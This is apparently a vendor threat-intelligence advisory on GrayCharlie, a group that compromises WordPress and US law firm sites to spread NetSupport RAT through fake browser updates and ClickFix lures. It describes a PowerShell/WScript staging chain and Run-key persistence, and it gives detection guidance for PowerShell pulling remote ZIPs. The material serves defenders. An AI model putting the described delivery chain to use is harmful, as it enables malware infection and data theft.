GrayCharlie’s Targeting of Law Firms

Published Date: February 19, 2026
Category: ShadowOpsIntel
Share:

GrayCharlie is a financially motivated threat actor active since mid-2023. The group specializes in compromising WordPress websites to deliver NetSupport RAT through fake browser update lures and ClickFix social engineering techniques. In late 2025, the actor was linked to a suspected supply-chain compromise affecting multiple U.S. law firms. The campaign infrastructure is largely hosted with MivoCloud and HZ Hosting Ltd, with operational indicators suggesting Russian-speaking operators.

Severity: High

Threat Actor Profile

  • Aliases: GrayCharlie overlaps with activity tracked as SmartApeSG, ZPHP, and HANEYMANEY.
  • Origin/Language: Evidence from higher-tier infrastructure and browsing activity suggests the operators are Russian-speaking.
  • Active Since: Mid-2023.
  • Motivation: Primarily data theft and financial gain.
  • Strategic Outlook: The group is highly persistent, frequently rotating infrastructure while maintaining consistent core behaviors; they are expected to remain active and continue targeting global organizations.

Attack Details

1. Initial Access & Delivery:

  • WordPress Compromise: Injects malicious JavaScript into legitimate but compromised WordPress sites.
  • Phishing & Malicious Links: Uses phishing emails, malicious PDFs, or links on gaming sites to drive traffic to compromised pages.

2. Social Engineering Lures:

  • Fake Browser Updates: Presents browser-specific prompts (Chrome, Edge, Firefox) to download a malicious package.
  • ClickFix (Fake CAPTCHA): Since early 2025, the group has shifted toward ClickFix lures that trick users into pasting a malicious command into the Windows Run dialog (Win+R).

3. Execution & Persistence:

  • Uses PowerShell and WScript to stage and retrieve secondary payloads.
  • Establishes persistence via a Run registry key to relaunch malware at startup.

4. Evasion:

  • Uses obfuscated JavaScript and conditional logic to deliver payloads only to specific visitors.
  • Relies extensively on proxy services to administer staging and C2 infrastructure.

Malware Toolkit

  1. Primary Payload: NetSupport RAT, a remote access trojan used for reconnaissance, file transfers, and secondary command execution.
  2. Secondary Payloads:
    • Stealc: An infostealer.
    • SectopRAT: A RAT often deployed as a follow-on infection.
  3. Additional Tools: Operators utilize Acunetix vulnerability scanners on some C2 servers.

Infrastructure Analysis

  • Hosting Providers: Primarily uses MivoCloud (for C2) and HZ Hosting Ltd (for staging).
  • C2 Clustering:
    • Cluster 1: Uses month-themed TLS certificates (e.g., “mar1”, “june2”).
    • Cluster 2: Uses a distinct TLS pattern (e.g., “sssi3”) and typically hosts Acunetix.
  • Staging Templates:
    • Type 1: Impersonates “Wiser University”.
    • Type 2: Impersonates “Activitar”.

Victimology & Targeting

  • General Targeting: Opportunistic across numerous industries.
  • Specific Campaign: A cluster of United States (US) law firm sites was compromised around November 2025.
  • Supply-Chain Vector: Suspected compromise of SMB Team, a law firm acceleration company, potentially through compromised hosting credentials or WordPress plugin vulnerabilities.

Recommendations

  1. For organizations running WordPress, ensure all plugins and core software are updated to the latest versions to close potential exploitation gaps.
  2. Regularly rotate administrative credentials and implement Multi-Factor Authentication (MFA) to prevent actors from using compromised logs or credentials to access site backends.
  3. Implement DLP to detect and block unauthorized file transfers, as GrayCharlie’s primary motivation appears to be financial gain through data theft.
  4. Train users to recognize ClickFix lures (fake CAPTCHAs) and prevent them from pasting commands directly into the Windows Run dialog (Win+R).
  5. Scrutinize the execution of wscript.exe spawning powershell.exe, a key step in the actor’s staging process.
  6. Monitor for the creation of new Run registry keys to automatically launch client32.exe at logon, which the actor uses to establish persistence for NetSupport RAT on the endpoint.
  7. Create detection logic for PowerShell downloading ZIP from remote server + extracting to %AppData%\Roaming.
  8. Block the IOCs at their respective controls
    https://www.virustotal.com/gui/collection/a8b46bc2b2ba022f3974b128e479e67f79476763bdb5f0c5f36c4b4ce7ad6a29/iocs

Source:

  • https://www.recordedfuture.com/research/graycharlie-hijacks-law-firm-sites-suspected-supply-chain-attack

Enjoyed reading this Threat Intelligence Advisory? Stay updated with our latest exclusive content by following us on Twitter and LinkedIn

No related posts found.

Ampcus Cyber
Privacy Overview

This website uses cookies so that we can provide you with the best user experience possible. Cookie information is stored in your browser and performs functions such as recognising you when you return to our website and helping our team to understand which sections of the website you find most interesting and useful.

 Talk to an expert